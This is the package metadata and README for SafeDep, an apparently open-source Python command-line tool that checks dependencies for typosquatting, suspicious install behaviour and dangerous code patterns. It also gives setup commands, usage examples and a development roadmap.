Metadata-Version: 2.4
Name: safedep
Version: 0.1.0
Summary: Protect your dependencies from supply chain attacks.
Author-email: Marcio Reck <marcio@fazmercado.com>
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.9
Description-Content-Type: text/markdown
Requires-Dist: requests
Requires-Dist: click
Requires-Dist: rich

# 🛡️ SafeDep: Your Dependency Guardian

**SafeDep** is an open-source tool designed to protect developers from Supply Chain Attacks. It analyzes packages and dependencies for malicious behavior, data exfiltration, and hidden vulnerabilities before you even install them.

> "Don't just scan for known vulnerabilities. Detect suspicious behavior."

---

## ✨ Why SafeDep?

The package ecosystem (PyPI, NPM, Cargo) is under constant attack from *Typosquatting*, *Dependency Injection*, and *Trojan Horses*. SafeDep goes beyond standard vulnerability databases (CVEs) by analyzing both the **static and dynamic behavior** of the code.

### Key Features
- 🔍 **Pre-install Sandbox**: Runs installation scripts in an isolated environment to monitor what they attempt to access.
- 📡 **Network Monitor**: Alerts you if a "text processing" package tries to make requests to unknown IP addresses.
- 🔑 **Secret Leak Detection**: Identifies if a package attempts to read your environment variables (`.env`) or API keys.
- 🏷️ **Typosquatting Protection**: Checks if a package name is dangerously similar to a popular one.

---

## 🛠️ Getting Started

To use **SafeDep** locally, clone the repository and install it in editable mode:

```bash
# create a virtual environment
python3 -m venv venv
source venv/bin/activate

# Install dependencies
pip install -r requirements.txt

# Install SafeDep in editable mode
pip install -e .
```

## 🚀 How to Use (CLI)

SafeDep provides two main commands:

### 1. Check a package before installing
Analyzes a package from PyPI for typosquatting and reputation risks.
```bash
safedep check <package_name>
```

### 2. Scan a local directory
Scans Python files for dangerous code patterns (e.g., `eval`, `os.system`).
```bash
safedep scan <path_to_directory>
```

---

## 🗺️ Development Roadmap

### Phase 1: Foundation (MVP) - "The Scanner" ✅ (Implemented)
- ✅ Implementation of name similarity analysis (Anti-Typosquatting).
- ✅ Reputation verification (package creation date, author history).
- ✅ Static code scanner for dangerous functions.

### Phase 2: Intelligence (Beta) - "The Behavioralist" 🧠
Sandboxing: Integration with Docker/Podman to run setup.py and monitor system calls (syscalls).
Multi-language Support: Adding support for NPM (Node.js) and Cargo (Rust) in addition to Python.
CI/CD Integration: GitHub Actions to block PRs with suspicious dependencies.

### Phase 3: Community and Sustainability - "The Shield" 🛡️
SafeDep Hub: A community-driven database of "audited and clean" packages.
Security Badges: A system for repositories to display security trust seals.
Sponsorship Program: Launching the Sponsors program to maintain the heavy analysis infrastructure.

---

## 🤝 Contribute & Sponsor
This project is 100% free and community-focused.
If you believe in a safer software ecosystem, consider becoming a contributor or sponsor.
Give a ⭐ on GitHub
Report Bugs
Become a Sponsor: [GitHub Sponsors](https://github.com/sponsors/marcioreck) / [OpenCollective](https://opencollective.com/marcioreck)
Developed for those who prioritize security.
